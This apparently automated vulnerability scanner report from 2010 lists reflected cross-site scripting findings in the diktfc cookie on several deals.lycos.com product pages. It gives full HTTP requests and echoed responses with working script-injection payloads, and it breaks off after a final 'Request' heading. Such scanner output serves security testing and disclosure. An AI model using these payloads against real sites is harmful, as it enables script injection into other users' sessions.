The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee78"><script>alert(1)</script>a4a1fb5c58d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c66"%3balert(1)//b6a939bc91 was submitted in the diktfc cookie. This input was echoed as 45c66";alert(1)//b6a939bc91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66"%3balert(1)//b6a939bc91; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17436
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ae2"><script>alert(1)</script>ecb316bab89 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55068"%3balert(1)//77d4c7afd2 was submitted in the diktfc cookie. This input was echoed as 55068";alert(1)//77d4c7afd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068"%3balert(1)//77d4c7afd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18733
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb5"%3balert(1)//cc77090642d was submitted in the diktfc cookie. This input was echoed as a4fb5";alert(1)//cc77090642d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5"%3balert(1)//cc77090642d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18823
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18fe"><script>alert(1)</script>50f5a41c6f0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:09 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf6"%3balert(1)//17d3e5f2582 was submitted in the diktfc cookie. This input was echoed as 34cf6";alert(1)//17d3e5f2582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6"%3balert(1)//17d3e5f2582; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18825
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57098"><script>alert(1)</script>17fbef7573c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:05 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec67"><script>alert(1)</script>28b95ad8bc4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... mg src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ca8"%3balert(1)//8f632b01aa9 was submitted in the diktfc cookie. This input was echoed as b1ca8";alert(1)//8f632b01aa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8"%3balert(1)//8f632b01aa9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc41"><script>alert(1)</script>85a55a54eb2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... mg src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb5d0"%3balert(1)//a5de5727a34 was submitted in the diktfc cookie. This input was echoed as eb5d0";alert(1)//a5de5727a34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0"%3balert(1)//a5de5727a34; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17684
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f448f"><script>alert(1)</script>e4b28d91281 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f691"%3balert(1)//38cfa6531c3 was submitted in the diktfc cookie. This input was echoed as 6f691";alert(1)//38cfa6531c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
